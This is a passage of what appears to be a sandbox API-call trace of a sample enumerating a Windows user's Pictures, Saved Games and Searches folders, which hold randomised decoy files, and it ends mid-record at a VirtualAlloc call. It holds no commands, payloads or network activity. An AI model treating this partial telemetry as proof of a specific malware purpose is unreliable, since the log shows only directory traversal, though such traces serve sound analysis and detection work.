lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\*", lpFindFileData=0x123a32c0 | out: lpFindFileData=0x123a32c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20acd70, ftCreationTime.dwHighDateTime=0x1d81e54, ftLastAccessTime.dwLowDateTime=0xda720750, ftLastAccessTime.dwHighDateTime=0x1d8209d, ftLastWriteTime.dwLowDateTime=0xda720750, ftLastWriteTime.dwHighDateTime=0x1d8209d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fec80 [0256.770] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20acd70, ftCreationTime.dwHighDateTime=0x1d81e54, ftLastAccessTime.dwLowDateTime=0xda720750, ftLastAccessTime.dwHighDateTime=0x1d8209d, ftLastWriteTime.dwLowDateTime=0xda720750, ftLastWriteTime.dwHighDateTime=0x1d8209d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.770] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50dddb30, ftCreationTime.dwHighDateTime=0x1d81fb8, ftLastAccessTime.dwLowDateTime=0x33de5d50, ftLastAccessTime.dwHighDateTime=0x1d828a7, ftLastWriteTime.dwLowDateTime=0x33de5d50, ftLastWriteTime.dwHighDateTime=0x1d828a7, nFileSizeHigh=0x0, nFileSizeLow=0xa873, dwReserved0=0x0, dwReserved1=0x0, cFileName="3rTk3Jmbl9H.gif", cAlternateFileName="3RTK3J~1.GIF")) returned 1 [0256.770] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc231ea90, ftCreationTime.dwHighDateTime=0x1d81bc8, ftLastAccessTime.dwLowDateTime=0x309edea0, ftLastAccessTime.dwHighDateTime=0x1d81c02, ftLastWriteTime.dwLowDateTime=0x309edea0, ftLastWriteTime.dwHighDateTime=0x1d81c02, nFileSizeHigh=0x0, nFileSizeLow=0xb965, dwReserved0=0x0, dwReserved1=0x0, cFileName="6FI0Bk.gif", cAlternateFileName="")) returned 1 [0256.770] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c765280, ftCreationTime.dwHighDateTime=0x1d8260c, ftLastAccessTime.dwLowDateTime=0x21e0e770, ftLastAccessTime.dwHighDateTime=0x1d82803, ftLastWriteTime.dwLowDateTime=0x21e0e770, ftLastWriteTime.dwHighDateTime=0x1d82803, nFileSizeHigh=0x0, nFileSizeLow=0x152d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8GIqGvL1RnpDF.png", cAlternateFileName="8GIQGV~1.PNG")) returned 1 [0256.770] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea03a920, ftCreationTime.dwHighDateTime=0x1d819f5, ftLastAccessTime.dwLowDateTime=0xb2cd4430, ftLastAccessTime.dwHighDateTime=0x1d82057, ftLastWriteTime.dwLowDateTime=0xb2cd4430, ftLastWriteTime.dwHighDateTime=0x1d82057, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y7n QDyh jI", cAlternateFileName="Y7NQDY~1")) returned 1 [0256.770] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.770] FindClose (in: hFindFile=0x8fec80 | out: hFindFile=0x8fec80) returned 1 [0256.771] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\Y7n QDyh jI" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\y7n qdyh ji"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.771] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\Y7n QDyh jI\\*", lpFindFileData=0x123a31b0 | out: lpFindFileData=0x123a31b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea03a920, ftCreationTime.dwHighDateTime=0x1d819f5, ftLastAccessTime.dwLowDateTime=0xb2cd4430, ftLastAccessTime.dwHighDateTime=0x1d82057, ftLastWriteTime.dwLowDateTime=0xb2cd4430, ftLastWriteTime.dwHighDateTime=0x1d82057, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fee80 [0256.771] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea03a920, ftCreationTime.dwHighDateTime=0x1d819f5, ftLastAccessTime.dwLowDateTime=0xb2cd4430, ftLastAccessTime.dwHighDateTime=0x1d82057, ftLastWriteTime.dwLowDateTime=0xb2cd4430, ftLastWriteTime.dwHighDateTime=0x1d82057, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.771] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31cdc380, ftCreationTime.dwHighDateTime=0x1d8231a, ftLastAccessTime.dwLowDateTime=0x925afd10, ftLastAccessTime.dwHighDateTime=0x1d823bc, ftLastWriteTime.dwLowDateTime=0x925afd10, ftLastWriteTime.dwHighDateTime=0x1d823bc, nFileSizeHigh=0x0, nFileSizeLow=0x17e78, dwReserved0=0x0, dwReserved1=0x0, cFileName="PigWS92hdGvp7.bmp", cAlternateFileName="PIGWS9~1.BMP")) returned 1 [0256.771] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.771] FindClose (in: hFindFile=0x8fee80 | out: hFindFile=0x8fee80) returned 1 [0256.772] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.772] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\*", lpFindFileData=0x123a33d0 | out: lpFindFileData=0x123a33d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77088e10, ftCreationTime.dwHighDateTime=0x1d81a43, ftLastAccessTime.dwLowDateTime=0x431de0f0, ftLastAccessTime.dwHighDateTime=0x1d81cf0, ftLastWriteTime.dwLowDateTime=0x431de0f0, ftLastWriteTime.dwHighDateTime=0x1d81cf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8ff040 [0256.772] FindNextFileW (in: hFindFile=0x8ff040, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77088e10, ftCreationTime.dwHighDateTime=0x1d81a43, ftLastAccessTime.dwLowDateTime=0x431de0f0, ftLastAccessTime.dwHighDateTime=0x1d81cf0, ftLastWriteTime.dwLowDateTime=0x431de0f0, ftLastWriteTime.dwHighDateTime=0x1d81cf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.772] FindNextFileW (in: hFindFile=0x8ff040, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f176030, ftCreationTime.dwHighDateTime=0x1d81fc4, ftLastAccessTime.dwLowDateTime=0xc3c54c30, ftLastAccessTime.dwHighDateTime=0x1d821a4, ftLastWriteTime.dwLowDateTime=0xc3c54c30, ftLastWriteTime.dwHighDateTime=0x1d821a4, nFileSizeHigh=0x0, nFileSizeLow=0xbb51, dwReserved0=0x0, dwReserved1=0x0, cFileName="NrMhV7-QFwSdl541.jpg", cAlternateFileName="NRMHV7~1.JPG")) returned 1 [0256.772] FindNextFileW (in: hFindFile=0x8ff040, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe060520, ftCreationTime.dwHighDateTime=0x1d81e1a, ftLastAccessTime.dwLowDateTime=0xe170a190, ftLastAccessTime.dwHighDateTime=0x1d827f7, ftLastWriteTime.dwLowDateTime=0xe170a190, ftLastWriteTime.dwHighDateTime=0x1d827f7, nFileSizeHigh=0x0, nFileSizeLow=0x2c4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="tuzhdj4RVGB0Q7rL.gif", cAlternateFileName="TUZHDJ~1.GIF")) returned 1 [0256.772] FindNextFileW (in: hFindFile=0x8ff040, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8c0ec0, ftCreationTime.dwHighDateTime=0x1d82289, ftLastAccessTime.dwLowDateTime=0x2b63b580, ftLastAccessTime.dwHighDateTime=0x1d8269f, ftLastWriteTime.dwLowDateTime=0x2b63b580, ftLastWriteTime.dwHighDateTime=0x1d8269f, nFileSizeHigh=0x0, nFileSizeLow=0xaa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="znhvxq7a7nR.gif", cAlternateFileName="ZNHVXQ~1.GIF")) returned 1 [0256.772] FindNextFileW (in: hFindFile=0x8ff040, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.772] FindClose (in: hFindFile=0x8ff040 | out: hFindFile=0x8ff040) returned 1 [0256.773] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.773] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\*", lpFindFileData=0x123a33d0 | out: lpFindFileData=0x123a33d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x397be4f0, ftCreationTime.dwHighDateTime=0x1d82611, ftLastAccessTime.dwLowDateTime=0xa074a5e0, ftLastAccessTime.dwHighDateTime=0x1d826cd, ftLastWriteTime.dwLowDateTime=0xa074a5e0, ftLastWriteTime.dwHighDateTime=0x1d826cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fec80 [0256.773] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x397be4f0, ftCreationTime.dwHighDateTime=0x1d82611, ftLastAccessTime.dwLowDateTime=0xa074a5e0, ftLastAccessTime.dwHighDateTime=0x1d826cd, ftLastWriteTime.dwLowDateTime=0xa074a5e0, ftLastWriteTime.dwHighDateTime=0x1d826cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.773] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef3fca0, ftCreationTime.dwHighDateTime=0x1d81e44, ftLastAccessTime.dwLowDateTime=0x8d31a700, ftLastAccessTime.dwHighDateTime=0x1d8209f, ftLastWriteTime.dwLowDateTime=0x8d31a700, ftLastWriteTime.dwHighDateTime=0x1d8209f, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="IlUU10BeX.gif", cAlternateFileName="ILUU10~1.GIF")) returned 1 [0256.773] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77a2db40, ftCreationTime.dwHighDateTime=0x1d81c51, ftLastAccessTime.dwLowDateTime=0x210aefc0, ftLastAccessTime.dwHighDateTime=0x1d81f71, ftLastWriteTime.dwLowDateTime=0x210aefc0, ftLastWriteTime.dwHighDateTime=0x1d81f71, nFileSizeHigh=0x0, nFileSizeLow=0x519f, dwReserved0=0x0, dwReserved1=0x0, cFileName="pMFEi hP0gxXvAtY.png", cAlternateFileName="PMFEIH~1.PNG")) returned 1 [0256.773] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324c89d0, ftCreationTime.dwHighDateTime=0x1d819ed, ftLastAccessTime.dwLowDateTime=0xb41e990, ftLastAccessTime.dwHighDateTime=0x1d82157, ftLastWriteTime.dwLowDateTime=0xb41e990, ftLastWriteTime.dwHighDateTime=0x1d82157, nFileSizeHigh=0x0, nFileSizeLow=0x16ede, dwReserved0=0x0, dwReserved1=0x0, cFileName="QRa-hJxxUp2Ecy98M.gif", cAlternateFileName="QRA-HJ~1.GIF")) returned 1 [0256.773] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff0a7430, ftCreationTime.dwHighDateTime=0x1d8261a, ftLastAccessTime.dwLowDateTime=0x6947dea0, ftLastAccessTime.dwHighDateTime=0x1d828e1, ftLastWriteTime.dwLowDateTime=0x6947dea0, ftLastWriteTime.dwHighDateTime=0x1d828e1, nFileSizeHigh=0x0, nFileSizeLow=0x16256, dwReserved0=0x0, dwReserved1=0x0, cFileName="UKjRjq2UGtPGf0Ar.jpg", cAlternateFileName="UKJRJQ~1.JPG")) returned 1 [0256.773] FindNextFileW (in: hFindFile=0x8fec80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.773] FindClose (in: hFindFile=0x8fec80 | out: hFindFile=0x8fec80) returned 1 [0256.774] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.775] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1daa3230, ftCreationTime.dwHighDateTime=0x1d81cf8, ftLastAccessTime.dwLowDateTime=0x1ee9afc0, ftLastAccessTime.dwHighDateTime=0x1d82119, ftLastWriteTime.dwLowDateTime=0x1ee9afc0, ftLastWriteTime.dwHighDateTime=0x1d82119, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fef00 [0256.775] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1daa3230, ftCreationTime.dwHighDateTime=0x1d81cf8, ftLastAccessTime.dwLowDateTime=0x1ee9afc0, ftLastAccessTime.dwHighDateTime=0x1d82119, ftLastWriteTime.dwLowDateTime=0x1ee9afc0, ftLastWriteTime.dwHighDateTime=0x1d82119, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.775] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86990460, ftCreationTime.dwHighDateTime=0x1d81f41, ftLastAccessTime.dwLowDateTime=0xe37afad0, ftLastAccessTime.dwHighDateTime=0x1d82897, ftLastWriteTime.dwLowDateTime=0xe37afad0, ftLastWriteTime.dwHighDateTime=0x1d82897, nFileSizeHigh=0x0, nFileSizeLow=0x128e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BahL errCaXXUL0.jpg", cAlternateFileName="BAHLER~1.JPG")) returned 1 [0256.775] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bb8020, ftCreationTime.dwHighDateTime=0x1d820c2, ftLastAccessTime.dwLowDateTime=0xdc081da0, ftLastAccessTime.dwHighDateTime=0x1d829d2, ftLastWriteTime.dwLowDateTime=0xdc081da0, ftLastWriteTime.dwHighDateTime=0x1d829d2, nFileSizeHigh=0x0, nFileSizeLow=0x10aad, dwReserved0=0x0, dwReserved1=0x0, cFileName="D5is0-m1xKE.png", cAlternateFileName="D5IS0-~1.PNG")) returned 1 [0256.775] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab3150c0, ftCreationTime.dwHighDateTime=0x1d81d98, ftLastAccessTime.dwLowDateTime=0x3b15c4e0, ftLastAccessTime.dwHighDateTime=0x1d8229a, ftLastWriteTime.dwLowDateTime=0x3b15c4e0, ftLastWriteTime.dwHighDateTime=0x1d8229a, nFileSizeHigh=0x0, nFileSizeLow=0x16097, dwReserved0=0x0, dwReserved1=0x0, cFileName="di-h-v4MS65pv.png", cAlternateFileName="DI-H-V~1.PNG")) returned 1 [0256.775] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7206b880, ftCreationTime.dwHighDateTime=0x1d824a0, ftLastAccessTime.dwLowDateTime=0xf2be0280, ftLastAccessTime.dwHighDateTime=0x1d82644, ftLastWriteTime.dwLowDateTime=0xf2be0280, ftLastWriteTime.dwHighDateTime=0x1d82644, nFileSizeHigh=0x0, nFileSizeLow=0x8d80, dwReserved0=0x0, dwReserved1=0x0, cFileName="ldvBDUlb8N1DKZb.gif", cAlternateFileName="LDVBDU~1.GIF")) returned 1 [0256.775] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.775] FindClose (in: hFindFile=0x8fef00 | out: hFindFile=0x8fef00) returned 1 [0256.776] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Saved Games" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.776] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Saved Games\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fea00 [0256.776] FindNextFileW (in: hFindFile=0x8fea00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.776] FindNextFileW (in: hFindFile=0x8fea00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.776] FindNextFileW (in: hFindFile=0x8fea00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.776] FindClose (in: hFindFile=0x8fea00 | out: hFindFile=0x8fea00) returned 1 [0256.776] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Searches" (normalized: "c:\\users\\rdhj0cnfevzx\\searches"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.776] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Searches\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fee80 [0256.777] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.777] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.777] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x437a1142, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0256.777] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0256.777] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.777] FindClose (in: hFindFile=0x8fee80 | out: hFindFile=0x8fee80) returned 1 [0256.778] VirtualAlloc (lpAddress=0x12740000, dwSize=0x100000, flAllocationType=0x1000, 